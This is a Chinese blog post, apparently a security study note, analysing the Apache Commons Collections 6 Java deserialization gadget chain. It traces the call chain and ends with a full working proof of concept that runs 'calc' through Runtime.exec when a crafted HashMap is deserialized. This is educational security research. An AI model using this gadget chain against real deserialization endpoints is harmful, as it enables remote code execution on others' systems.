高考报名时间2022年11月1日还剩 距离2023年6月7日高考还有
栏目分类:
子分类:
返回
名师互学网用户登录
名师互学网
快速导航关闭
当前搜索
当前分类
前沿技术 软件开发 系统运维 产品运营 生活办公 面试经验 考试题库
子分类
人工智能 大数据 云计算 区块链 物联网 深度学习 机器学习 NLP 计算机视觉 语音识别 其他 大数据系统 数据可视化 数据挖掘与分析 其他 Docker/k8s 虚拟化 云平台 其他 基本原理 数字货币 智能合约 EOS应用 其他 通讯技术 嵌入式开发 单片机 物联网应用 HarmonyOS 其他 后端开发 Web开发 移动开发 游戏开发 Python Java 架构设计 C/C++/C# PHP .Net Go语言 R语言
实用工具
学习工具 小学数学练习 字帖生成 在线画板 函数绘制 拼音字母表 在线词典 黄历查询 亲戚关系计算 安全期计算 中国历史 Excel函数 模拟请求 json格式化 浏览器指纹
热门搜索
路由器设置 木托盘 宝塔面板 儿童python教程 心情低落 朋友圈 vim 双一流学科 专升本 我的学校 日记学校 西点培训学校 汽修学校 情书 化妆学校 塔沟武校 异形模板 西南大学排名 最精辟人生短句 6步教你追回被骗的钱 南昌大学排名 清朝十二帝 北京印刷学院排名 北方工业大学排名 北京航空航天大学排名 首都经济贸易大学排名 中国传媒大学排名 首都师范大学排名 中国地质大学(北京)排名 北京信息科技大学排名
名师互学网 > IT > 软件开发 > 后端开发 > Java

CommonsCollections6分析

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

CommonsCollections6分析

CommonsCollections6

LazyMap的漏洞触发在get和invoke中,完全没有setValue什么事,这也说明8u71后不能利用的原因和AnnotationInvocationHandler#readObject 中有没有setValue没任何关系在java8u71以后sun.reflect.annotation.AnnotationInvocationHandler#readObject的逻辑变化了

解决java高版本利用问题,实际上就是在上下文中是否还有其他调用LazyMap#get()的地方

org.apache.commons.collections.keyvalue.TiedMapEntry 在getValue方法中调用了this.map.get

直接分析那块调用了LazyMap类中的get() CC6中给出了这个类 TiedMapEntry中的HashCode我们直接进入TiedMapEntry进行分析

调用链

```java
ObjectInputStream.readObject()
    |
HashMap.ReadObject()
    |
HashMap.put()
    |    
HashMap.putval()
    |    
HashMap.hash()
    |    
HashMap.hashCode()
    |
TiedMapEntry.hashCode()
    |
LazyMap.get()
    |
ChainedTransformer.transform()
    |
InvokeTransformer.transform()
```

ysoserial版本调用链


  
 
一些类的分析 
 TiedMapEntry类分析 
 
TiedMapEntry接收一个map类的值 一个key
 
 
 
 
 TiedMapEntry中的hashCode调用了getValue()
 
 
 
 
 跟到getvalue()中 可以看到这里有个map.get 我们只需要将map值传LazyMap即可触发LazyMap.get()
 
 
 
 
 通过这里我们就直接可以构造
 
 
前面部分和CC1 LazyMap版本一样 让LazyMap.get触发命令执行
 
  
  
Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
HashMap map=new HashMap();
//置空 防止序列化时调用
Map lazyMap=LazyMap.decorate(map,new ConstantTransformer(1));


  
 
和cc1的区别是我们接下来不是用AnnotationInvocationHandler#readObject去触发 而是使用TiedMapEntry 类去触发
 
  
  
TiedMapEntry tiedMapEntry=newTiedMapEntry(lazyMap,"aaaa");


  
 
这里使用的是HashSet来进行构造,将前面的TiedMapEntry实例化对象添加进去。后面还调用了lazyMap.remove方法将aaaa给移除,这是因为在执行的时候如果没使用lazyMap.remove将aaaa给移除掉将不会进入到该判断语句里面去
 
  
  
HashMap map2=new HashMap();
map2.put(tiedMapEntry,"bbb");
lazyMap.remove("aaaa");


  
 
这里 如果传入的key不等于false就不会执行transform就无法执行命令 所以需要remove将aaaa移除掉
 
 
 
 
之后剩下的部分和cc1 TransformedMap版本中一样 使HashMap put触发hashcode()
 
 
最终poc 
  
  
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class cc6{
    public static void main(String[] args) throws Exception {

        Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);

        HashMap map=new HashMap();

//       置空 防止序列化时调用
        Map lazyMap=LazyMap.decorate(map,new ConstantTransformer(1));


        TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"aaaa");

        HashMap map2=new HashMap();
        map2.put(tiedMapEntry,"bbb");
        lazyMap.remove("aaaa");

        //通过反射修改值
        Class c =LazyMap.class;
        Field factoryField=c.getDeclaredField("factory");
        System.out.println(factoryField);
        factoryField.setAccessible(true);
        factoryField.set(lazyMap,chainedTransformer);


        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(map2);
        oos.close();

        ObjectInputStream ois =new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o=ois.readObject();
        System.out.println(o);




    }
}


  
 
参考学习 
 
P神java代码审计








转载请注明:文章转载自 www.mshxw.com


本文地址:https://www.mshxw.com/it/697347.html















Java相关栏目本月热门文章













热门相关搜索






路由器设置
木托盘
宝塔面板
儿童python教程
心情低落
朋友圈
vim
双一流学科
专升本
我的学校
日记学校
西点培训学校
汽修学校
情书
化妆学校
塔沟武校
异形模板
西南大学排名
最精辟人生短句
6步教你追回被骗的钱
南昌大学排名
清朝十二帝
北京印刷学院排名
北方工业大学排名
北京航空航天大学排名
首都经济贸易大学排名
中国传媒大学排名
首都师范大学排名
中国地质大学(北京)排名
北京信息科技大学排名
中央民族大学排名
北京舞蹈学院排名
北京电影学院排名
中国戏曲学院排名
河北政法职业学院排名
河北经贸大学排名
天津中德应用技术大学排名
天津医学高等专科学校排名
天津美术学院排名
天津音乐学院排名
天津工业大学排名
北京工业大学耿丹学院排名
北京警察学院排名
天津科技大学排名
北京邮电大学(宏福校区)排名
北京网络职业学院排名
北京大学医学部排名
河北科技大学排名
河北地质大学排名
河北体育学院排名















学习工具


代数计算器


三角函数


解析几何


立体几何






知识解答


教育知识


百科知识


生活知识


常识知识






写作必备


作文大全


作文素材


句子大全



实用范文






关于我们


关于我们


联系我们


网站地图






 交流群

名师互学网交流群




名师互学网客服

名师互学网客服












名师互学网 版权所有 (c)2021-2022      ICP备案号:晋ICP备2021003244-6号
 








我们一直用心在做

关于我们
文章归档
网站地图
联系我们

版权所有 (c)2021-2022 MSHXW.COM


ICP备案号:晋ICP备2021003244-6号